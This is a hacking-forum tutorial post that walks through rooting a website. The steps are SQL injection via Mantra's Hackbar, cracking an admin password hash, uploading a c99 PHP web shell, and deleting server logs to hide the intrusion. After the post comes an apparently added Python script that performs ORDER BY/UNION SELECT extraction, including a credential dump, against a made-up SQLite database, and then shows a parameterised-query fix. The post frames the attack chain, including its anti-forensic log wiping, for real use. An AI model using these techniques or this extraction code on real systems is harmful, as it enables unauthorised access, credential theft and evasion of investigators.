dEEpEst Posted October 1, 2016

Hi All,

In this tutorial we will be rooting a vulnerable web server using the Mantra Security Toolkit.

What you need:
1. Mantra Security Toolkit >>> http://level23hacktools.com/forum/showthread.php?t=27041
2. A vulnerable website. I'm using a modified version of [hidden content]
3. Any PHP shell you are comfortable with - Google for "c99 shell"

Now the process:

Step 1: I'm on the home page of the website now.
Code: [hidden content]

Step 2: I went through all the pages of the web site and found a page with URL input.
Code: [hidden content]

Step 3: I launched Hackbar by pressing F9.
[hidden content]

Step 4: The power of the single quote. I'm checking whether the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Code: [hidden content]

Step 6: I have to keep on increasing the last number till I see any change in the page. In usual practice it's going to be a tedious task, since there will be hundreds or thousands of tables, if not more. But with this tool I can simply press the + button till I see any change on the web page.
Code: [hidden content]

Step 7: I went up to 7 and no change till now.
Code: [hidden content]

Step 8: I'm on 8 now and I can see the page changed.
Code: [hidden content]

Step 9: Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.
[hidden content]

Step 10: I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exist and there are only 7 tables.
[hidden content]

Step 11: Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2.
Code: [hidden content]

Step 12: I replaced number 2 in the URL with another SQL command; it got executed and the result is displayed on the page.
Code: [hidden content]
The current user is cms_user@localhost.

Step 13: Let's find out the version of the database. I replaced 2 in the URL with the version() command.
Code: [hidden content]
5.0.45 is the version.

Step 14: Let me list all the tables.
Code: [hidden content]
From this list I found "user" is an interesting table.

Step 15: Now I listed all the columns, and it's a big list.
Code: [hidden content]

Step 16: I want the columns from the table "user" and nothing else.
Code: [hidden content]

Step 17: Let's find the user name.
Code: [hidden content]

Step 18: Now, what about the password?
Code: [hidden content]
It's encrypted.

Step 19: Decrypting the password. I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
[hidden content]

Step 20: Voila! I got the password.
[hidden content]

Step 21: Finding the login page. It was right in front of me.
[hidden content]

Step 22: Logging in with the credentials I have.
[hidden content]

Step 23: Greetings!
[hidden content]

Step 24: I'm an admin now. Look at my powers.
[hidden content]

Step 25: Let me add an event.
[hidden content]

Step 26: And of course I want to upload a picture.
[hidden content]

Step 27: Let's see whether it allows me to upload the shell or not.
[hidden content]

Step 28: Now I'm pressing the "Add Event" button.
[hidden content]

Step 29: Nice. Looks like it got uploaded.
[hidden content]

Step 30: Let's see where the shell got uploaded to.
[hidden content]

Step 31: I'm trying to get the default upload location.
[hidden content]

Step 32: Looks like I got it. Let me click on the c9shell.php file I just uploaded.
[hidden content]

Step 33: Voila. I have shell access.
[hidden content]

Step 34: I simply clicked on the up button to get to the root folder. Now I can do whatever I wish: deface the website, maintain access, or whatever. But that's out of the scope of the current tutorial.
[hidden content]

Step 35: What I'm interested in is the log folder.
[hidden content]

Step 36: I clicked on the log.log file and it has the logs of my noisy SQL injection attacks.
[hidden content]

Step 37: Let me go back and edit the log file.
[hidden content]

Step 38: I deleted all the log entries. Now saving it.
[hidden content]

Step 39: Nice. The log file is empty now.
[hidden content]

Step 40: Now let's remove the c99 shell by pressing Self Remove.
[hidden content]

Step 41: Confirmed!
[hidden content]

Step 42: OK. Good bye, C99.
[hidden content]

Step 43: Well. It deleted itself.
[hidden content]
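The ORDER BY / UNION SELECT sequence from Steps 6 to 18, as an added example that is not part of the original post or of the Mantra toolkit. It runs the same kind of payloads against a constructed in-memory SQLite database: the events table, the user row and its md5('admin') hash are all made up for the example. SQLite stands in for the post's MySQL 5.0 target, so sqlite_version() replaces version(), sqlite_master replaces information_schema.tables, and there is no user(). The number that ORDER BY n probes is the number of columns in the vulnerable SELECT (the post describes it as the table count). The last function runs the same payload against a parameterised query, which is the fix for this class of bug.

```python
"""Added example, not code from the original post or the Mantra toolkit.

Reproduces the tutorial's ORDER BY probing and UNION SELECT extraction
against a constructed SQLite database, then shows the hardened query.
"""
import sqlite3


def build_db():
    """Constructed sample data standing in for the tutorial's CMS.
    Table names, rows and the md5('admin') hash are all made up here."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    cur.executemany("INSERT INTO events (title, body) VALUES (?, ?)",
                    [("Launch", "Opening event"), ("Meetup", "Monthly meetup")])
    cur.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    cur.execute("INSERT INTO user (username, password) VALUES (?, ?)",
                ("admin", "21232f297a57a5a743894a0e4a801fc3"))  # md5('admin')
    conn.commit()
    return conn


def vulnerable_lookup(conn, event_id):
    """The pattern the post exploits: the URL parameter is pasted into SQL."""
    sql = f"SELECT id, title, body FROM events WHERE id = {event_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, event_id):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    return conn.execute(
        "SELECT id, title, body FROM events WHERE id = ?", (event_id,)
    ).fetchall()


def find_column_count(conn, max_cols=20):
    """Steps 6-8: raise ORDER BY n until the page changes (here: the query
    errors). The last n that worked is the column count of the SELECT."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_extract(conn, ncols, expression):
    """Steps 11-18: place an expression in the second column of a UNION
    SELECT and read it back from the page. Column 1 carries a sentinel
    (-1) so injected rows can be told apart from real rows."""
    if ncols < 2:
        raise ValueError("need at least two columns for this layout")
    cols = ["-1", expression] + ["NULL"] * (ncols - 2)
    payload = "-1 UNION SELECT " + ",".join(cols)
    rows = vulnerable_lookup(conn, payload)
    return [row[1] for row in rows if row[0] == -1]


def demo():
    """Run the whole chain and return what an attacker would read off the page."""
    conn = build_db()
    ncols = find_column_count(conn)
    version = union_extract(conn, ncols, "sqlite_version()")[0]
    tables = union_extract(
        conn, ncols,
        "(SELECT group_concat(name) FROM sqlite_master WHERE type='table')")[0]
    creds = union_extract(
        conn, ncols,
        "(SELECT group_concat(username || ':' || password) FROM user)")[0]
    # Same payload against the parameterised query: it is compared as a
    # literal value with the integer id column and matches no row.
    blocked = safe_lookup(conn, "-1 UNION SELECT -1, sqlite_version(), NULL")
    return ncols, version, tables, creds, blocked


if __name__ == "__main__":
    cols, ver, tabs, cred, blocked = demo()
    print(f"columns={cols} version={ver} tables={tabs}")
    print(f"dumped credentials: {cred}")
    print(f"rows returned by the parameterised query: {blocked}")
```

The sentinel in column 1 is the same trick the post uses when it puts a negative id before the UNION: the original WHERE clause matches nothing, so only the injected row reaches the page.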
jiggaman Posted October 27, 2017

Re: Advanced SQL Injection Tutorial - Complete website rooting

This is a totally complete, real tutorial.